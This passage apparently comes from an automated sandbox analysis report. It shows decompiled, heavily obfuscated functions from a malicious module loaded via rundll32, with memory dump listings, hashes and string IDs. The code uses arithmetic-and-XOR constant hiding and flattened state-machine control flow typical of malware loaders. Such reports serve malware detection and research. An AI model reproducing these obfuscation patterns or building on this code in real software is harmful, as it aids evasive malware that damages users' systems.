                                                                                                                      				intOrPtr* _t247;
                                                                                                                      				void* _t249;
                                                                                                                      				intOrPtr _t250;
                                                                                                                      				void* _t289;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				signed int _t293;
                                                                                                                      				signed int _t294;
                                                                                                                      				signed int _t295;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t297;
                                                                                                                      				signed int _t298;
                                                                                                                      				signed int* _t301;
                                                                                                                      
                                                                                                                      				_t291 = _a4;
                                                                                                                      				_t247 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t291);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t208);
                                                                                                                      				_v132 = 0x7182e5;
                                                                                                                      				_t301 =  &(( &_v156)[4]);
                                                                                                                      				_v132 = _v132 + 0x26fa;
                                                                                                                      				_t289 = 0;
                                                                                                                      				_t249 = 0xa47caa1;
                                                                                                                      				_t292 = 0x79;
                                                                                                                      				_v132 = _v132 / _t292;
                                                                                                                      				_t293 = 0x16;
                                                                                                                      				_v132 = _v132 / _t293;
                                                                                                                      				_v132 = _v132 ^ 0x00000aee;
                                                                                                                      				_v140 = 0x29ca9c;
                                                                                                                      				_v140 = _v140 + 0x24a5;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 + 0xffff55cc;
                                                                                                                      				_v140 = _v140 ^ 0x053d3dfc;
                                                                                                                      				_v136 = 0x4d5d35;
                                                                                                                      				_v136 = _v136 | 0x2dd38e58;
                                                                                                                      				_v136 = _v136 + 0xffffc96a;
                                                                                                                      				_v136 = _v136 | 0xcd817148;
                                                                                                                      				_v136 = _v136 ^ 0xedde351d;
                                                                                                                      				_v152 = 0x709b91;
                                                                                                                      				_t294 = 0x24;
                                                                                                                      				_v152 = _v152 / _t294;
                                                                                                                      				_v152 = _v152 | 0xc56f7625;
                                                                                                                      				_v152 = _v152 << 6;
                                                                                                                      				_v152 = _v152 ^ 0x5bd1c7f0;
                                                                                                                      				_v144 = 0x2195b1;
                                                                                                                      				_v144 = _v144 | 0x0c2b25b9;
                                                                                                                      				_v144 = _v144 << 8;
                                                                                                                      				_v144 = _v144 | 0x32a70c97;
                                                                                                                      				_v144 = _v144 ^ 0x3bb2e9a3;
                                                                                                                      				_v120 = 0x3a67b3;
                                                                                                                      				_v120 = _v120 + 0xffff86f2;
                                                                                                                      				_v120 = _v120 + 0xf6d6;
                                                                                                                      				_v120 = _v120 ^ 0x00358b42;
                                                                                                                      				_v108 = 0x732c66;
                                                                                                                      				_t68 =  &_v108; // 0x732c66
                                                                                                                      				_t295 = 0x35;
                                                                                                                      				_v108 =  *_t68 / _t295;
                                                                                                                      				_v108 = _v108 << 0xb;
                                                                                                                      				_v108 = _v108 ^ 0x11669525;
                                                                                                                      				_v156 = 0x38089d;
                                                                                                                      				_v156 = _v156 ^ 0x13a0f5b7;
                                                                                                                      				_v156 = _v156 | 0xc9f1c7ca;
                                                                                                                      				_v156 = _v156 << 0xf;
                                                                                                                      				_v156 = _v156 ^ 0xfffe1365;
                                                                                                                      				_v128 = 0x743938;
                                                                                                                      				_v128 = _v128 ^ 0xec4d11e9;
                                                                                                                      				_v128 = _v128 | 0xa250e655;
                                                                                                                      				_v128 = _v128 * 0x41;
                                                                                                                      				_v128 = _v128 ^ 0x8cf42415;
                                                                                                                      				_v100 = 0x6d926d;
                                                                                                                      				_t296 = 0x34;
                                                                                                                      				_v100 = _v100 / _t296;
                                                                                                                      				_v100 = _v100 ^ 0x000eb1c4;
                                                                                                                      				_v116 = 0xefa621;
                                                                                                                      				_v116 = _v116 + 0xffff82bb;
                                                                                                                      				_t297 = 0x3d;
                                                                                                                      				_v116 = _v116 * 0x32;
                                                                                                                      				_v116 = _v116 ^ 0x2eb07dcc;
                                                                                                                      				_v88 = 0x5b377;
                                                                                                                      				_v88 = _v88 + 0x8d9;
                                                                                                                      				_v88 = _v88 ^ 0x00067740;
                                                                                                                      				_v112 = 0x4d19ae;
                                                                                                                      				_v112 = _v112 ^ 0x630c5599;
                                                                                                                      				_v112 = _v112 ^ 0xe5b09bfb;
                                                                                                                      				_v112 = _v112 ^ 0x86f4ef46;
                                                                                                                      				_v148 = 0x4966c6;
                                                                                                                      				_v148 = _v148 / _t297;
                                                                                                                      				_v148 = _v148 << 1;
                                                                                                                      				_v148 = _v148 ^ 0x19f6490a;
                                                                                                                      				_v148 = _v148 ^ 0x19fea643;
                                                                                                                      				_v104 = 0x4e28a7;
                                                                                                                      				_v104 = _v104 ^ 0x0c2039e4;
                                                                                                                      				_t298 = 0x43;
                                                                                                                      				_v104 = _v104 / _t298;
                                                                                                                      				_v104 = _v104 ^ 0x002b1fa2;
                                                                                                                      				_v96 = 0xfd59a6;
                                                                                                                      				_v96 = _v96 ^ 0x1da99ba6;
                                                                                                                      				_v96 = _v96 ^ 0x1d58c7ea;
                                                                                                                      				_v92 = 0x8125dc;
                                                                                                                      				_v92 = _v92 << 7;
                                                                                                                      				_v92 = _v92 ^ 0x409d3f45;
                                                                                                                      				_v124 = 0x45818f;
                                                                                                                      				_v124 = _v124 ^ 0x2c821393;
                                                                                                                      				_v124 = _v124 << 0xc;
                                                                                                                      				_v124 = _v124 + 0x7cf7;
                                                                                                                      				_v124 = _v124 ^ 0x792e1e67;
                                                                                                                      				do {
                                                                                                                      					while(_t249 != 0x4baccf8) {
                                                                                                                      						if(_t249 == 0x7c30f3d) {
                                                                                                                      							_t231 = E001864F1( &_v52, _v156,  &_v16, _v128);
                                                                                                                      							_pop(_t254);
                                                                                                                      							if(_t231 != 0) {
                                                                                                                      								_push(_t254);
                                                                                                                      								_t242 = E00183512(_v48);
                                                                                                                      								 *_t291 = _t242;
                                                                                                                      								if(_t242 != 0) {
                                                                                                                      									E0018FD29(_v52, _v112,  *_t291, _v148, _v48);
                                                                                                                      									_t301 =  &(_t301[3]);
                                                                                                                      									 *((intOrPtr*)(_t291 + 4)) = _v48;
                                                                                                                      									_t289 = 1;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t249 = 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0x9cf6742) {
                                                                                                                      							_t234 = E001904DE(_v144, _v120,  &_v76,  &_v68, _v108);
                                                                                                                      							_t301 =  &(_t301[3]);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t249 = ( ~_t234 & 0xf851ec41) + 0xf7122fc;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xa47caa1) {
                                                                                                                      							_t249 = 0x4baccf8;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 == 0xbfbcb36) {
                                                                                                                      							if(E0018CC89( &_v76,  &_v84, _v152) == 0) {
                                                                                                                      								L8:
                                                                                                                      								return _t289;
                                                                                                                      							}
                                                                                                                      							_t249 = 0x9cf6742;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t249 != 0xf7122fc) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						E001768DE(_v104, _v96, _v92, _v124, _v76);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					_t226 =  *((intOrPtr*)(_t247 + 4));
                                                                                                                      					_t250 =  *_t247;
                                                                                                                      					_v80 = _t226;
                                                                                                                      					_v84 = _t250;
                                                                                                                      					_t228 = _t226 - 1 + _t250;
                                                                                                                      					while(_t228 > _t250) {
                                                                                                                      						if( *_t228 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t228 = _t228 - 1;
                                                                                                                      					}
                                                                                                                      					_t229 = _t228 - _t250;
                                                                                                                      					_v80 = _t229;
                                                                                                                      					if(_t229 == 0) {
                                                                                                                      						L24:
                                                                                                                      						_t249 = 0xbfbcb36;
                                                                                                                      						goto L25;
                                                                                                                      					}
                                                                                                                      					while(_v80 % _v140 != _v132) {
                                                                                                                      						_t206 =  &_v80;
                                                                                                                      						 *_t206 = _v80 - 1;
                                                                                                                      						if( *_t206 != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L24;
                                                                                                                      					}
                                                                                                                      					goto L24;
                                                                                                                      					L25:
                                                                                                                      				} while (_t249 != 0x4e0187e);
                                                                                                                      				goto L8;
                                                                                                                      			}
















































                                                                                                                      0x0017bf38
                                                                                                                      0x0017bf40
                                                                                                                      0x0017bf48
                                                                                                                      0x0017bf50
                                                                                                                      0x0017bf5c
                                                                                                                      0x0017bf64
                                                                                                                      0x0017bf68
                                                                                                                      0x0017bf70
                                                                                                                      0x0017bf78
                                                                                                                      0x0017bf80
                                                                                                                      0x0017bf88
                                                                                                                      0x0017bf90
                                                                                                                      0x0017bf95
                                                                                                                      0x0017bf9d
                                                                                                                      0x0017bfa5
                                                                                                                      0x0017bfad
                                                                                                                      0x0017bfb2
                                                                                                                      0x0017bfba
                                                                                                                      0x0017bfc2
                                                                                                                      0x0017bfc2
                                                                                                                      0x0017bfd4
                                                                                                                      0x0017c09b
                                                                                                                      0x0017c0a1
                                                                                                                      0x0017c0a4
                                                                                                                      0x0017c0b3
                                                                                                                      0x0017c0bb
                                                                                                                      0x0017c0c0
                                                                                                                      0x0017c0c6
                                                                                                                      0x0017c0dd
                                                                                                                      0x0017c0eb
                                                                                                                      0x0017c0ee
                                                                                                                      0x0017c0f1
                                                                                                                      0x0017c0f1
                                                                                                                      0x0017c0c6
                                                                                                                      0x0017c0f2
                                                                                                                      0x00000000
                                                                                                                      0x0017c0f2
                                                                                                                      0x0017bfe0
                                                                                                                      0x0017c069
                                                                                                                      0x0017c06e
                                                                                                                      0x0017c075
                                                                                                                      0x0017c07d
                                                                                                                      0x00000000
                                                                                                                      0x0017c07d
                                                                                                                      0x0017bfe8
                                                                                                                      0x0017c049
                                                                                                                      0x00000000
                                                                                                                      0x0017c049
                                                                                                                      0x0017bff0
                                                                                                                      0x0017c03d
                                                                                                                      0x0017c016
                                                                                                                      0x0017c022
                                                                                                                      0x0017c022
                                                                                                                      0x0017c03f
                                                                                                                      0x00000000
                                                                                                                      0x0017c03f
                                                                                                                      0x0017bff4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c00e
                                                                                                                      0x00000000
                                                                                                                      0x0017c013
                                                                                                                      0x0017c0f9
                                                                                                                      0x0017c0fc
                                                                                                                      0x0017c0fe
                                                                                                                      0x0017c103
                                                                                                                      0x0017c107
                                                                                                                      0x0017c111
                                                                                                                      0x0017c10e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c110
                                                                                                                      0x0017c110
                                                                                                                      0x0017c115
                                                                                                                      0x0017c117
                                                                                                                      0x0017c11b
                                                                                                                      0x0017c135
                                                                                                                      0x0017c135
                                                                                                                      0x00000000
                                                                                                                      0x0017c135
                                                                                                                      0x0017c11d
                                                                                                                      0x0017c12f
                                                                                                                      0x0017c12f
                                                                                                                      0x0017c133
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017c133
                                                                                                                      0x00000000
                                                                                                                      0x0017c13a
                                                                                                                      0x0017c13a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5]M$89t$f,s
                                                                                                                      • API String ID: 0-187558970
                                                                                                                      • Opcode ID: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction ID: bdf851ffa5afb06f50b6f40772be529044e137a4680bef89ca840ab122b4ea7c
                                                                                                                      • Opcode Fuzzy Hash: b8f6f788a1341fb326c7f6acff40e4f4ddc65e0342340909664983d1fd6761a5
                                                                                                                      • Instruction Fuzzy Hash: B9B14571508380DFC358CF25C89951BBBF1FBC8358F408A2DF59A96260D7B59A49CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00173FB8() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				signed int _v1172;
                                                                                                                      				void* _t262;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				void* _t279;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int* _t309;
                                                                                                                      
                                                                                                                      				_t309 =  &_v1172;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_t279 = 0xa0c284c;
                                                                                                                      				_v1056 = 0xafe7d9;
                                                                                                                      				_v1052 = 0x960b65;
                                                                                                                      				_v1120 = 0x40f49c;
                                                                                                                      				_v1120 = _v1120 + 0xc807;
                                                                                                                      				_v1120 = _v1120 * 0x4f;
                                                                                                                      				_v1120 = _v1120 ^ 0x1446f881;
                                                                                                                      				_v1116 = 0x6254e6;
                                                                                                                      				_t305 = 3;
                                                                                                                      				_v1116 = _v1116 * 5;
                                                                                                                      				_v1116 = _v1116 + 0xcc41;
                                                                                                                      				_v1116 = _v1116 ^ 0x01ee9a48;
                                                                                                                      				_v1104 = 0xc01800;
                                                                                                                      				_v1104 = _v1104 | 0x48a752a3;
                                                                                                                      				_v1104 = _v1104 ^ 0x48e65f13;
                                                                                                                      				_v1128 = 0x7c2fed;
                                                                                                                      				_v1128 = _v1128 | 0x2c3c97c8;
                                                                                                                      				_v1128 = _v1128 * 0x77;
                                                                                                                      				_v1128 = _v1128 ^ 0xadff29d3;
                                                                                                                      				_v1136 = 0x195939;
                                                                                                                      				_v1136 = _v1136 + 0xfffffbae;
                                                                                                                      				_v1136 = _v1136 * 0x49;
                                                                                                                      				_v1136 = _v1136 ^ 0x073ad8c6;
                                                                                                                      				_v1168 = 0xbc4bb5;
                                                                                                                      				_v1168 = _v1168 / _t305;
                                                                                                                      				_v1168 = _v1168 << 0xd;
                                                                                                                      				_v1168 = _v1168 ^ 0xd1f3631f;
                                                                                                                      				_v1168 = _v1168 ^ 0x0980812e;
                                                                                                                      				_v1084 = 0x2affe9;
                                                                                                                      				_v1084 = _v1084 >> 0xd;
                                                                                                                      				_v1084 = _v1084 ^ 0x00075e3f;
                                                                                                                      				_v1112 = 0x7143ab;
                                                                                                                      				_v1112 = _v1112 >> 0xb;
                                                                                                                      				_t306 = 0x4a;
                                                                                                                      				_v1112 = _v1112 / _t306;
                                                                                                                      				_v1112 = _v1112 ^ 0x000905fb;
                                                                                                                      				_v1100 = 0xf39387;
                                                                                                                      				_v1100 = _v1100 + 0xffffb245;
                                                                                                                      				_v1100 = _v1100 ^ 0x00f5952a;
                                                                                                                      				_v1160 = 0xdc501f;
                                                                                                                      				_v1160 = _v1160 >> 0xb;
                                                                                                                      				_v1160 = _v1160 | 0xffab4649;
                                                                                                                      				_v1160 = _v1160 * 0x4a;
                                                                                                                      				_v1160 = _v1160 ^ 0xe7809492;
                                                                                                                      				_v1076 = 0x9b6a27;
                                                                                                                      				_v1076 = _v1076 >> 9;
                                                                                                                      				_v1076 = _v1076 ^ 0x0000c221;
                                                                                                                      				_v1132 = 0x7dd85e;
                                                                                                                      				_v1132 = _v1132 + 0xffff3c07;
                                                                                                                      				_v1132 = _v1132 ^ 0x5ccf103a;
                                                                                                                      				_v1132 = _v1132 ^ 0x5cb197cc;
                                                                                                                      				_v1060 = 0x3a660e;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c30fae7;
                                                                                                                      				_v1060 = _v1060 ^ 0x9c0496c9;
                                                                                                                      				_v1124 = 0xd6fa60;
                                                                                                                      				_v1124 = _v1124 >> 0xc;
                                                                                                                      				_v1124 = _v1124 * 0x63;
                                                                                                                      				_v1124 = _v1124 ^ 0x0000f3a0;
                                                                                                                      				_v1088 = 0xffa7cd;
                                                                                                                      				_v1088 = _v1088 ^ 0xcc4f33e8;
                                                                                                                      				_v1088 = _v1088 ^ 0xccbde027;
                                                                                                                      				_v1096 = 0xc2302a;
                                                                                                                      				_v1096 = _v1096 ^ 0x3cf81aba;
                                                                                                                      				_v1096 = _v1096 ^ 0x3c3bc632;
                                                                                                                      				_v1064 = 0x2b9d03;
                                                                                                                      				_v1064 = _v1064 + 0xffffce76;
                                                                                                                      				_v1064 = _v1064 ^ 0x0029f92b;
                                                                                                                      				_v1164 = 0x820e56;
                                                                                                                      				_v1164 = _v1164 >> 0xd;
                                                                                                                      				_v1164 = _v1164 + 0xa8ad;
                                                                                                                      				_v1164 = _v1164 | 0xfa0f2dae;
                                                                                                                      				_v1164 = _v1164 ^ 0xfa046831;
                                                                                                                      				_v1068 = 0x2883d9;
                                                                                                                      				_v1068 = _v1068 + 0xffff633a;
                                                                                                                      				_v1068 = _v1068 ^ 0x0026d05d;
                                                                                                                      				_v1156 = 0x6f33fd;
                                                                                                                      				_v1156 = _v1156 << 0xe;
                                                                                                                      				_v1156 = _v1156 + 0xfcd0;
                                                                                                                      				_v1156 = _v1156 + 0x75bd;
                                                                                                                      				_v1156 = _v1156 ^ 0xcd0f8dab;
                                                                                                                      				_v1172 = 0xb8c1fe;
                                                                                                                      				_v1172 = _v1172 << 6;
                                                                                                                      				_v1172 = _v1172 * 0x6a;
                                                                                                                      				_v1172 = _v1172 << 4;
                                                                                                                      				_v1172 = _v1172 ^ 0x014ff662;
                                                                                                                      				_v1148 = 0xbed93a;
                                                                                                                      				_v1148 = _v1148 * 0x3e;
                                                                                                                      				_v1148 = _v1148 << 0xa;
                                                                                                                      				_v1148 = _v1148 ^ 0x5e071c48;
                                                                                                                      				_v1148 = _v1148 ^ 0xbc7b36e3;
                                                                                                                      				_v1092 = 0x46d8d3;
                                                                                                                      				_v1092 = _v1092 << 5;
                                                                                                                      				_v1092 = _v1092 ^ 0x08d1099a;
                                                                                                                      				_v1140 = 0x5a5c4c;
                                                                                                                      				_v1140 = _v1140 ^ 0xa959b0b3;
                                                                                                                      				_v1140 = _v1140 << 3;
                                                                                                                      				_v1140 = _v1140 ^ 0x481958d7;
                                                                                                                      				_v1080 = 0xac3d63;
                                                                                                                      				_v1080 = _v1080 * 0x50;
                                                                                                                      				_v1080 = _v1080 ^ 0x35d8e2dc;
                                                                                                                      				_v1152 = 0x840294;
                                                                                                                      				_v1152 = _v1152 + 0xffff0ee6;
                                                                                                                      				_v1152 = _v1152 ^ 0xf9fb415c;
                                                                                                                      				_v1152 = _v1152 | 0x82095beb;
                                                                                                                      				_v1152 = _v1152 ^ 0xfb725375;
                                                                                                                      				_v1072 = 0xb67c6d;
                                                                                                                      				_v1072 = _v1072 + 0xffffc0d8;
                                                                                                                      				_v1072 = _v1072 ^ 0x00b2e767;
                                                                                                                      				_v1144 = 0x5c5bd3;
                                                                                                                      				_v1144 = _v1144 ^ 0x420c1b91;
                                                                                                                      				_v1144 = _v1144 * 0x79;
                                                                                                                      				_v1144 = _v1144 >> 9;
                                                                                                                      				_v1144 = _v1144 ^ 0x002d898c;
                                                                                                                      				_v1108 = 0xefd7e6;
                                                                                                                      				_v1108 = _v1108 * 0x73;
                                                                                                                      				_v1108 = _v1108 * 0x61;
                                                                                                                      				_v1108 = _v1108 ^ 0xd2fa3683;
                                                                                                                      				do {
                                                                                                                      					while(_t279 != 0x10bc038) {
                                                                                                                      						if(_t279 == 0x5d7fb4e) {
                                                                                                                      							E001841A7();
                                                                                                                      							L11:
                                                                                                                      							_t279 = 0x10bc038;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0x666e3d5) {
                                                                                                                      							E001744FA( &_v520, _v1064, _v1164, _v1068, _v1156);
                                                                                                                      							_push( &_v1040);
                                                                                                                      							_push( &_v520);
                                                                                                                      							_push(_v1092);
                                                                                                                      							E00178D95(_v1172, _v1148, __eflags);
                                                                                                                      							_t309 =  &(_t309[6]);
                                                                                                                      							_t279 = 0xe0c3523;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0x90d07ee) {
                                                                                                                      							_t274 = E001804B8();
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						if(_t279 == 0xa0c284c) {
                                                                                                                      							_t274 =  *0x19520c; // 0x0
                                                                                                                      							__eflags =  *((intOrPtr*)(_t274 + 0x438));
                                                                                                                      							_t279 =  !=  ? 0x90d07ee : 0x5d7fb4e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t279 != 0xe0c3523) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						 *((short*)(E00184FA8(_v1140,  &_v1040, _v1080, _v1152))) = 0;
                                                                                                                      						return E00175B6B(_v1072, _v1144,  &_v1040, _v1108);
                                                                                                                      					}
                                                                                                                      					_push(_v1112);
                                                                                                                      					_push(_v1084);
                                                                                                                      					_push(0x1710cc);
                                                                                                                      					_t262 = E0017AB66(_v1136, _v1168, __eflags);
                                                                                                                      					_t281 =  *0x19520c; // 0x0
                                                                                                                      					_t283 =  *0x19520c; // 0x0
                                                                                                                      					__eflags = _t283 + 8;
                                                                                                                      					E0017E7CE(_t262, _t283 + 8, _v1100, _t283 + 8, _t281 + 0x220, _v1160, _v1076, _v1132, _v1060, _t281 + 0x220);
                                                                                                                      					E0017AE03(_v1124, _v1088, _v1096, _t262);
                                                                                                                      					_t309 =  &(_t309[0xd]);
                                                                                                                      					_t279 = 0x666e3d5;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t279 - 0xfda68b3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t274;
                                                                                                                      			}














































                                                                                                                      0x0017438a
                                                                                                                      0x00174405
                                                                                                                      0x00000000
                                                                                                                      0x00174405
                                                                                                                      0x00174392
                                                                                                                      0x001743e7
                                                                                                                      0x001743ee
                                                                                                                      0x001743f5
                                                                                                                      0x00000000
                                                                                                                      0x001743f5
                                                                                                                      0x0017439a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001743c2
                                                                                                                      0x00000000
                                                                                                                      0x001743d9
                                                                                                                      0x0017446d
                                                                                                                      0x00174471
                                                                                                                      0x0017447d
                                                                                                                      0x00174482
                                                                                                                      0x00174487
                                                                                                                      0x001744af
                                                                                                                      0x001744b5
                                                                                                                      0x001744c4
                                                                                                                      0x001744dc
                                                                                                                      0x001744e1
                                                                                                                      0x001744e4
                                                                                                                      0x001744e9
                                                                                                                      0x001744e9
                                                                                                                      0x001744e9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: L\Z$/|$Tb
                                                                                                                      • API String ID: 0-3338791969
                                                                                                                      • Opcode ID: b328d1ea44c25b23725075258ecc3c8fdcc6c8ee9deda327bfcddd7c1ae4902c
                                                                                                                      • Instruction ID: 9a9f14717f8fe3790a941b1b8db081707bcd8299bd3e9f4d3f7d2d6429ca46de
                                                                                                                      • Opcode Fuzzy Hash: b328d1ea44c25b23725075258ecc3c8fdcc6c8ee9deda327bfcddd7c1ae4902c
                                                                                                                      • Instruction Fuzzy Hash: 46D1E0714083818FC768CF61C48A51FBBF1FBD4758F208A1DF2AA96260D7B58A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017F93D() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				intOrPtr _v1044;
                                                                                                                      				intOrPtr _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				void* _t255;
                                                                                                                      				void* _t258;
                                                                                                                      				intOrPtr _t259;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				void* _t266;
                                                                                                                      				intOrPtr _t302;
                                                                                                                      				signed int _t303;
                                                                                                                      				signed int _t304;
                                                                                                                      				signed int _t305;
                                                                                                                      				signed int _t306;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int* _t315;
                                                                                                                      
                                                                                                                      				_t315 =  &_v1140;
                                                                                                                      				_v1056 = 0x7fa207;
                                                                                                                      				_v1052 = 0x3c49bf;
                                                                                                                      				_t266 = 0x35a8362;
                                                                                                                      				_t302 = 0;
                                                                                                                      				_v1048 = 0;
                                                                                                                      				_v1044 = 0;
                                                                                                                      				_v1060 = 0xe96fdd;
                                                                                                                      				_v1060 = _v1060 + 0xffff4dc5;
                                                                                                                      				_v1060 = _v1060 ^ 0x00e8fae7;
                                                                                                                      				_v1084 = 0x95aacc;
                                                                                                                      				_t303 = 0x76;
                                                                                                                      				_v1084 = _v1084 / _t303;
                                                                                                                      				_v1084 = _v1084 ^ 0x00004e07;
                                                                                                                      				_v1132 = 0x8ad3c0;
                                                                                                                      				_t304 = 0x3b;
                                                                                                                      				_v1132 = _v1132 / _t304;
                                                                                                                      				_t305 = 5;
                                                                                                                      				_v1132 = _v1132 / _t305;
                                                                                                                      				_t306 = 0x2e;
                                                                                                                      				_v1132 = _v1132 / _t306;
                                                                                                                      				_v1132 = _v1132 ^ 0x0002326f;
                                                                                                                      				_v1136 = 0x5025c5;
                                                                                                                      				_v1136 = _v1136 | 0xd1709035;
                                                                                                                      				_v1136 = _v1136 + 0xfffff598;
                                                                                                                      				_v1136 = _v1136 | 0xced027f9;
                                                                                                                      				_v1136 = _v1136 ^ 0xdffed43e;
                                                                                                                      				_v1076 = 0x8b6e07;
                                                                                                                      				_v1076 = _v1076 ^ 0x693ed631;
                                                                                                                      				_v1076 = _v1076 ^ 0x69bbe5bc;
                                                                                                                      				_v1096 = 0x201396;
                                                                                                                      				_v1096 = _v1096 ^ 0x88694b71;
                                                                                                                      				_v1096 = _v1096 + 0xffff467e;
                                                                                                                      				_v1096 = _v1096 ^ 0x884e23ab;
                                                                                                                      				_v1068 = 0x6d8c34;
                                                                                                                      				_v1068 = _v1068 ^ 0x91e2fcbf;
                                                                                                                      				_v1068 = _v1068 ^ 0x9185a139;
                                                                                                                      				_v1128 = 0x807b8c;
                                                                                                                      				_v1128 = _v1128 | 0x3609e9e3;
                                                                                                                      				_v1128 = _v1128 + 0xffff6ddf;
                                                                                                                      				_v1128 = _v1128 + 0xffffdf1a;
                                                                                                                      				_v1128 = _v1128 ^ 0x3687a3ab;
                                                                                                                      				_v1104 = 0xe6d4b9;
                                                                                                                      				_v1104 = _v1104 >> 0xd;
                                                                                                                      				_t307 = 0x48;
                                                                                                                      				_v1104 = _v1104 / _t307;
                                                                                                                      				_v1104 = _v1104 * 0x6c;
